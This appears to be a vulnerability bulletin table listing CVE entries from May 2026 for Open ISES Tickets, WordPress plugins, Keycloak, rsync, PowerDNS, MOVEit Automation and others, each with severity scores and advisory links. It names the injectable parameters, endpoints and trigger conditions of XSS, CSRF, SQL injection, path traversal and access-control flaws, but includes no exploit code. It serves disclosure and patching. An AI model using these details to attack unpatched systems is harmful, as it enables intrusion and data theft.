| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in routes_i.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into HTML form hidden input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48229 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-routes-i-php-ticket-id-parameter |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in ticketsmdb_import.php that allows authenticated attackers to inject arbitrary JavaScript by passing unsanitized values through multiple POST parameters (mdbhost, mdbdb, mdbuser, mdbpassword, mdbprefix, ticketshost, ticketsdb, ticketsuser, ticketspassword, ticketsprefix) directly into HTML form hidden input value attributes. Attackers can craft a malicious request containing a JavaScript payload that executes in the victim's browser when the response is rendered. | 2026-05-21 | 5.4 | CVE-2026-48230 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-ticketsmdb-import-php-multiple-parameters |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 embeds a hardcoded WhitePages reverse-phone API key in wp1.php that is committed to the public source repository. Any actor with read access to the source tree can extract the key and use it to make third-party API calls billed to or rate-limited against the original owner's WhitePages account. | 2026-05-21 | 5.3 | CVE-2026-48243 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-whitepages-api-key-in-wp1-php |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 embeds a hardcoded Google Maps API key in settings.inc.php that is committed to the public source repository. The key can be extracted by anyone with read access to the source and used to make Google Maps Platform requests billed against the original owner's Google Cloud project. | 2026-05-21 | 5.3 | CVE-2026-48244 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-google-maps-api-key-in-settings-inc-php |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 embeds a hardcoded Google Maps API key in tables.php that is committed to the public source repository. The key can be extracted by anyone with read access to the source and used to make Google Maps Platform requests billed against the original owner's Google Cloud project. | 2026-05-21 | 5.3 | CVE-2026-48245 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-hardcoded-google-maps-api-key-in-tables-php |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 disables TLS certificate verification in ajax/reports.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) when issuing outbound HTTPS requests for Google Maps Directions API lookups during incident report generation. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. | 2026-05-21 | 5.9 | CVE-2026-48246 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-ajax-reports-php |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 disables TLS certificate verification in incs/functions.inc.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) for the general-purpose outbound HTTPS requests issued by the shared helper functions. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. | 2026-05-21 | 5.9 | CVE-2026-48247 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-incs-functions-inc-php |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 disables TLS certificate verification in incs/login.inc.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) for the outbound HTTPS requests issued during the login/authentication flow. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. | 2026-05-21 | 5.9 | CVE-2026-48248 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-incs-login-inc-php |
| Open ISES--Tickets | Open ISES Tickets before 3.44.2 disables TLS certificate verification in rm/incs/mobile_login.inc.php by setting CURLOPT_SSL_VERIFYPEER to false (and not setting CURLOPT_SSL_VERIFYHOST) for the outbound HTTPS requests issued during the mobile (RouteMate) login flow. An attacker positioned on the network path between the server and the remote endpoint can present a forged certificate to intercept, monitor, or modify the request and response, including any API keys or session-bearing data in transit. | 2026-05-21 | 5.9 | CVE-2026-48249 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-disabled-tls-certificate-verification-in-rm-incs-mobile-login-inc-php |
| OpenHarmony--OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker to achieve arbitrary code execution. | 2026-05-19 | 6.5 | CVE-2026-28733 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md |
| OpenHarmony--OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker to cause an information leak. | 2026-05-19 | 5.5 | CVE-2026-25850 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md |
| OpenHarmony--OpenHarmony | in OpenHarmony v6.0 and prior versions allow a local attacker to cause an information leak. | 2026-05-19 | 5.5 | CVE-2026-27766 | https://gitcode.com/openharmony/security/tree/master/zh/security-disclosure/2026/2026-05.md |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in single_unit.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the id GET parameter directly into an HTML attribute. Attackers can craft a malicious URL containing a JavaScript payload in the id parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35007 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-single-unit-php-id-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in single.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into an HTML attribute. Attackers can craft a malicious URL containing a JavaScript payload in the id parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35008 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-single-php-ticket-id-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add_note.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a hidden input field VALUE attribute. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35009 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-note-php-ticket-id-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in patient_JF.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a JavaScript variable assignment. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35010 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-patient-jf-php-ticket-id-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in opena.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_call GET parameter directly into page output. Attackers can craft a malicious URL containing a JavaScript payload in the frm_call parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35011 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-opena-php-frm-call-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in add_facnote.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a hidden input field VALUE attribute. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35012 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-add-facnote-php-ticket-id-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in street_view.php that allows authenticated attackers to inject arbitrary JavaScript by passing unsanitized values through the thelat and thelng GET parameters directly into JavaScript variable assignments. Attackers can craft a malicious URL containing a JavaScript payload in either parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35013 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-street-view-php-thelat-and-thelng-parameters |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in routes_nm.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the ticket_id GET parameter directly into a hidden input field VALUE attribute. Attackers can craft a malicious URL containing a JavaScript payload in the ticket_id parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35014 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-routes-nm-php-ticket-id-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in do_unit_mail.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the the_ticket GET parameter directly into a JavaScript variable assignment. Attackers can craft a malicious URL containing a JavaScript payload in the the_ticket parameter that executes in the victim's browser when the URL is visited. | 2026-05-20 | 4.6 | CVE-2026-35015 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-do-unit-mail-php-the-ticket-parameter |
| openises--tickets | Open ISES Tickets before 3.44.2 contains a reflected cross-site scripting vulnerability in search.php that allows authenticated attackers to inject arbitrary JavaScript by passing an unsanitized value through the frm_query POST parameter directly into an HTML input field VALUE attribute. Attackers can craft a malicious request containing a JavaScript payload in the frm_query parameter that executes in the victim's browser when submitted. | 2026-05-20 | 4.6 | CVE-2026-35016 | https://github.com/openises/tickets/releases/tag/v3.44.2 https://github.com/openises/tickets/commit/ecfeb406a016766cae81c749e14b5145a9f2dbff https://www.vulncheck.com/advisories/open-ises-tickets-reflected-xss-via-search-php-frm-query-parameter |
| opensourcepos--Open Source Point of Sale | A vulnerability was detected in opensourcepos Open Source Point of Sale up to 3.4.2. This issue affects the function getPicThumb of the file app/Controllers/Items.php. The manipulation of the argument pic_filename results in path traversal. The attack may be launched remotely. The patch is identified as def0c27a0e252668df8d942fc31e16d1edfd7323. A patch should be applied to remediate this issue. The vendor was contacted early about this disclosure. | 2026-05-18 | 4.3 | CVE-2026-8802 | VDB-364435 (opensourcepos Open Source Point of Sale Items.php getPicThumb path traversal); CTI Indicators (IOB, IOC, TTP, IOA); Submit #802559 (opensourcepos Open Source Point of Sale 3.4.1 Path Traversal) https://github.com/opensourcepos/opensourcepos/security/advisories/GHSA-xq63-3v4g-39r5 https://github.com/opensourcepos/opensourcepos/pull/4545 https://github.com/opensourcepos/opensourcepos/commit/def0c27a0e252668df8d942fc31e16d1edfd7323 |
| owencutajar--SponsorMe | The SponsorMe plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via PHP_SELF Parameter in all versions up to, and including, 0.5.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. The PHP_SELF value is reflected in two separate locations within the vulnerable function - a form action attribute and an anchor href attribute - both of which can be exploited by appending a crafted payload to the wp-admin/admin.php URL path. | 2026-05-20 | 6.1 | CVE-2026-8626 | https://www.wordfence.com/threat-intel/vulnerabilities/id/7df7f541-b8aa-46fa-bfca-b333beea27f9?source=cve https://plugins.trac.wordpress.org/browser/sponsorme/trunk/sponsorme.php#L440 https://plugins.trac.wordpress.org/browser/sponsorme/trunk/sponsorme.php#L475 |
| pftool--Alfie Feed Plugin | The Alfie - Feed Plugin plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.2.1. This is due to missing nonce validation on the alfie_manage() function which handles feed deletion via the 'delete' GET parameter. This makes it possible for unauthenticated attackers to delete arbitrary plugin feed data (from alfie_colindex, alfie_producten, alfie_reactions, and alfie_searchproduct tables) via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-22 | 4.3 | CVE-2026-4070 | https://www.wordfence.com/threat-intel/vulnerabilities/id/af36719a-8f7d-46dc-a697-cfcbb08e45e2?source=cve https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/trunk/include/alfie-manage.php#L60 https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/tags/1.2.1/include/alfie-manage.php#L60 https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/trunk/include/alfie-manage.php#L58 https://plugins.trac.wordpress.org/browser/alfie-the-productfeedtool-wp-plugin/tags/1.2.1/include/alfie-manage.php#L58 |
| PowerDNS--Authoritative | Insufficient Validation of Names During AXFR | 2026-05-21 | 6.8 | CVE-2026-42000 | https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html |
| PowerDNS--Authoritative | Concurrency and locking defects in GSS-TSIG | 2026-05-21 | 5.9 | CVE-2026-42002 | https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html |
| PowerDNS--Authoritative | Incorrect Behaviour of Views with TCP PROXY Requests | 2026-05-21 | 4.8 | CVE-2026-41999 | https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html |
| PowerDNS--Authoritative | Insufficient Validation of Member Zone Data May Cause Catalog Zone Transfer to Fail | 2026-05-21 | 4.9 | CVE-2026-42396 | https://docs.powerdns.com/authoritative/security-advisories/powerdns-advisory-powerdns-2026-06.html |
| Progress Software--MOVEit Automation | Incorrect default permissions vulnerability in Progress Software MOVEit Automation allows Retrieve Embedded Sensitive Data. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. | 2026-05-20 | 6.5 | CVE-2026-8487 | https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html |
| Progress Software--MOVEit Automation | Uncontrolled Memory Allocation vulnerability in Progress Software MOVEit Automation allows Excessive Allocation. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. | 2026-05-20 | 5.9 | CVE-2026-8485 | https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html |
| Progress Software--MOVEit Automation | Allocation of resources without limits or throttling vulnerability in Progress Software MOVEit Automation allows Flooding. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. | 2026-05-20 | 5.3 | CVE-2026-8486 | https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html |
| Progress Software--MOVEit Automation | Allocation of resources without limits or throttling vulnerability in Progress Software MOVEit Automation allows Excessive Allocation. This issue affects MOVEit Automation: before 2025.0.11, from 2025.1.0 before 2025.1.7. | 2026-05-20 | 4.3 | CVE-2026-8488 | https://docs.progress.com/bundle/moveit-automation-release-notes-2026/page/Fixed-Issues-2026.html |
| QuantumNous--new-api | A weakness has been identified in QuantumNous new-api up to 0.12.1. The impacted element is the function SearchUserTopUps/SearchAllTopUps of the file model/topup.go of the component self Endpoint. This manipulation causes sql injection. The attack can be initiated remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way. | 2026-05-23 | 6.3 | CVE-2026-9305 | VDB-365252 (QuantumNous new-api self Endpoint topup.go SearchAllTopUps sql injection); CTI Indicators (IOB, IOC, TTP, IOA); Submit #812192 (QuantumNous new-api [Needs Manual Input] SQL Injection (CWE-89)); Submit #812195 (QuantumNous new-api 0.12.1 Improper Neutralization of Data Query Logic (CWE-943), duplicate) https://gist.github.com/YLChen-007/cf501d0a66c81298b2f97e854f3813db |
| rdbeach--BLOGCHAT Chat System | The BLOGCHAT Chat System plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.3.6.3. This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to update settings and inject malicious web scripts via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-05-20 | 6.1 | CVE-2026-8420 | https://www.wordfence.com/threat-intel/vulnerabilities/id/a62186aa-19aa-445b-8fdc-b029bdafd58f?source=cve https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L208 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L208 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L215 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L215 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L222 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L222 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/trunk/wp-blogchat-widget.php#L293 https://plugins.trac.wordpress.org/browser/blogchat-chat-system/tags/1.3.6.3/wp-blogchat-widget.php#L293 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. The cross-session verification proof is keyed only by (local userId, idpAlias) and is not bound to the upstream identity that was actually verified, so a second upstream account on the same IdP can consume it and get linked to the victim's local account. | 2026-05-20 | 6.4 | CVE-2026-9087 | https://access.redhat.com/security/cve/CVE-2026-9087 RHBZ#2480172 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. When both realm-level and client-level `notBefore` revocation policies are configured, Keycloak's OpenID Connect (OIDC) Introspection feature fails to properly honor the realm-level policy. This allows tokens that should have been revoked to remain active, potentially leading to unauthorized access or continued session validity. This could impact the security of systems utilizing Keycloak for identity and access management. | 2026-05-19 | 5.4 | CVE-2026-8922 | https://access.redhat.com/security/cve/CVE-2026-8922 RHBZ#2479586 |
| Red Hat--Red Hat Build of Keycloak | A flaw was found in Keycloak. An authenticated user can bypass configured WebAuthn policies during credential registration by manipulating client-side JavaScript. This occurs because the server-side processAction() fails to validate that the newly created credential's parameters, such as public key algorithms, match the realm's configured WebAuthn policies. This could lead to the creation of credentials that do not adhere to administrative security requirements, potentially weakening the overall security posture of the system by allowing non-compliant authentication methods. | 2026-05-19 | 4.3 | CVE-2026-8830 | https://access.redhat.com/security/cve/CVE-2026-8830 RHBZ#2479565 |
| Red Hat--Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. This access control vulnerability in Keycloak's OpenID Connect (OIDC) token introspection endpoint allows a confidential client to bypass audience restrictions. An attacker-controlled client with valid credentials can retrieve sensitive token claims intended for other resource servers, compromising the confidentiality of lightweight access tokens. This issue can be exploited remotely by any confidential client in the realm with valid credentials. | 2026-05-19 | 6.5 | CVE-2026-37979 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-37979 RHBZ#2455328 |
| Red Hat--Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. This authentication vulnerability allows a remote attacker to replay `ExecuteActionsActionToken` tokens within Keycloak's WebAuthn (Web Authentication) flow. By intercepting an execute-actions email link, an attacker can register their own authenticator to a victim's account. This leads to unauthorized enrollment of a hardware-backed credential, enabling persistent account takeover. | 2026-05-19 | 6.8 | CVE-2026-37982 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-37982 RHBZ#2455329 |
| Red Hat--Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. An authenticated client could exploit an Insecure Direct Object Reference (IDOR) vulnerability in the Authorization Services Protection API endpoint. By knowing or obtaining a resource's unique identifier (UUID) belonging to another Resource Server within the same realm, the client could bypass authorization checks. This allows the client to perform unauthorized GET, PUT, and DELETE operations on resources, leading to information disclosure and potential unauthorized modification or deletion of data. | 2026-05-19 | 6.8 | CVE-2026-4630 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-4630 RHBZ#2450245 |
| Red Hat--Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. A low-privilege administrator with the 'view-clients' role can exploit this by invoking the 'evaluate-scopes' Admin API endpoints with an arbitrary user ID (userId) parameter. This vulnerability allows for cross-role personally identifiable information (PII) leakage, enabling unauthorized visibility into user identities and authorizations across the realm. Exploitation is possible remotely via network access to the Admin API. | 2026-05-19 | 4.9 | CVE-2026-37978 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-37978 RHBZ#2455327 |
| Red Hat--Red Hat build of Keycloak 26.4 | A flaw was found in Keycloak. A broken access control vulnerability in the Account Resources user lookup endpoint allows a remote authenticated user, who owns at least one User-Managed Access (UMA) resource, to enumerate and harvest personally identifiable information (PII) for all realm users. By sending crafted requests with arbitrary usernames or email values, the endpoint returns full profile objects for unrelated users. This leads to broad profile-level information disclosure. | 2026-05-19 | 4.3 | CVE-2026-37981 | RHSA-2026:19596 RHSA-2026:19597 https://access.redhat.com/security/cve/CVE-2026-37981 RHBZ#2455326 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libsolv. This heap buffer overflow vulnerability occurs when a victim processes a specially crafted `.solv` file containing negative size values in the `repo_add_solv` function. This leads to an undersized memory allocation and a subsequent out-of-bounds write. An attacker could exploit this to cause a denial of service (DoS). | 2026-05-20 | 6.5 | CVE-2026-9149 | https://access.redhat.com/security/cve/CVE-2026-9149 RHBZ#2460380 https://github.com/openSUSE/libsolv/pull/617 |
| Red Hat--Red Hat Enterprise Linux 10 | A flaw was found in libsolv. This stack-based buffer overflow vulnerability occurs in libsolv's Debian metadata parser when processing specially crafted Debian repository metadata. An attacker could exploit this by providing malicious SHA384 or SHA512 checksum tags, leading to memory corruption and a denial of service (DoS) in the affected system. | 2026-05-20 | 6.5 | CVE-2026-9150 | https://access.redhat.com/security/cve/CVE-2026-9150 RHBZ#2460379 https://github.com/openSUSE/libsolv/pull/616 |
| registrationformbuilder--Vedrixa Forms User Registration Form, Signup Form & Drag & Drop Form Builder | The Vedrixa Forms - User Registration Form, Signup Form & Drag & Drop Form Builder plugin for WordPress is vulnerable to authorization bypass in all versions up to, and including, 1.1.1. This is due to the plugin not properly verifying that a user is authorized to perform an action. This makes it possible for authenticated attackers, with subscriber-level access and above, to overwrite the structure of any form - adding, removing, or altering fields - by writing attacker-controlled data to the plugin's FORMS database table. The 'ajax-nonce' nonce used by this handler is injected into the public frontend via wp_localize_script(), so any authenticated user who visits a page containing a form shortcode can obtain it without any elevated access. | 2026-05-22 | 4.3 | CVE-2026-8692 | https://www.wordfence.com/threat-intel/vulnerabilities/id/1b3b8a6c-1c84-4abe-ad4a-02302b04987b?source=cve https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.1.1/admin/class-registration-form-builder-admin.php#L866 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.1.1/includes/class-registration-form-builder.php#L174 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.1.1/public/class-registration-form-builder-public.php#L121 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.0.0/admin/class-registration-form-builder-admin.php#L866 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.0.0/includes/class-registration-form-builder.php#L174 https://plugins.trac.wordpress.org/browser/vedrixa-forms-registration-builder/tags/1.0.0/public/class-registration-form-builder-public.php#L121 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3540543%40vedrixa-forms-registration-builder&new=3540543%40vedrixa-forms-registration-builder&sfp_email=&sfph_mail= |
| Revolution Slider--Slider Revolution | The Slider Revolution plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 7.0.9 via the 'get_stream_data()' function. This makes it possible for unauthenticated attackers to extract sensitive data including published password-protected post, page, and product content. | 2026-05-20 | 5.3 | CVE-2026-6728 | https://www.wordfence.com/threat-intel/vulnerabilities/id/3cd7be2c-9ba9-4d25-8907-610898df5834?source=cve https://www.sliderrevolution.com/changelog/ |
| RsyncProject--rsync | Rsync version 3.4.2 and prior contain symlink race condition vulnerabilities in path-based system calls including chmod, lchown, utimes, rename, unlink, mkdir, symlink, mknod, link, rmdir, and lstat that allow local attackers to redirect operations to files outside the exported rsync module. Attackers with local filesystem access can exploit the timing window between path resolution and syscall execution by swapping symlinks to apply sender-supplied permissions, ownership, timestamps, or filenames to arbitrary files outside the intended module boundary on rsync daemons configured with 'use chroot = no'. | 2026-05-20 | 6.3 | CVE-2026-43619 | https://github.com/RsyncProject/rsync/security/advisories/GHSA-4h9m-w5ff-j735 https://github.com/RsyncProject/rsync/releases/tag/v3.4.3 https://www.vulncheck.com/advisories/rsync-symlink-race-condition-via-path-based-syscalls |
| RsyncProject--rsync | Rsync version 3.4.2 and prior contain a receiver-side out-of-bounds array read vulnerability in recv_files() in receiver.c that allows a malicious rsync server to crash the rsync client process. Attackers can exploit the vulnerability by setting CF_INC_RECURSE in compatibility flags and sending a specially crafted file list where the first sorted entry is not the leading dot directory, followed by a transfer record with ndx=0 and an iflag word without ITEM_TRANSFER, causing the receiver to read 8 bytes before the allocated pointer array and dereference an invalid pointer at an unmapped address, resulting in a deterministic SIGSEGV crash of the rsync client. | 2026-05-20 | 6.5 | CVE-2026-43620 | https://github.com/RsyncProject/rsync/security/advisories/GHSA-28pw-r563-rxvm https://github.com/RsyncProject/rsync/releases/tag/v3.4.3 https://www.vulncheck.com/advisories/rsync-out-of-bounds-array-read-via-recv-files |
| RsyncProject--rsync | Rsync version 3.4.2 and prior contain an authorization bypass vulnerability in the rsync daemon's hostname-based access control list enforcement when configured with chroot. Attackers can bypass hostname-based deny rules by controlling the PTR record for their source IP address, allowing connections from hostnames that administrators intended to deny when reverse DNS resolution fails and defaults to UNKNOWN. | 2026-05-20 | 4.8 | CVE-2026-43617 | https://github.com/RsyncProject/rsync/security/advisories/GHSA-rjfm-3w2m-jf4f https://github.com/RsyncProject/rsync/releases/tag/v3.4.3 https://www.vulncheck.com/advisories/rsync-authorization-bypass-via-hostname-resolution |
| Samsung Open Source--Escargot | Uncontrolled Recursion vulnerability in Samsung Open Source Escargot allows Oversized Serialized Data Payloads. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47309 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source--Escargot | Release of invalid pointer or reference vulnerability in Samsung Open Source Escargot allows Buffer Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47312 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source--Escargot | Memory allocation with excessive size value vulnerability in Samsung Open Source Escargot allows Excessive Allocation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47313 | https://github.com/Samsung/escargot/pull/1565 |
| Samsung Open Source--Escargot | Improper Check for Unusual or Exceptional Conditions vulnerability in Samsung Open Source Escargot allows Input Data Manipulation. This issue affects Escargot: 590345cc6258317c5da850d846ce6baaf2afc2d3. | 2026-05-19 | 5.5 | CVE-2026-47315 | https://github.com/Samsung/escargot/pull/1565 |
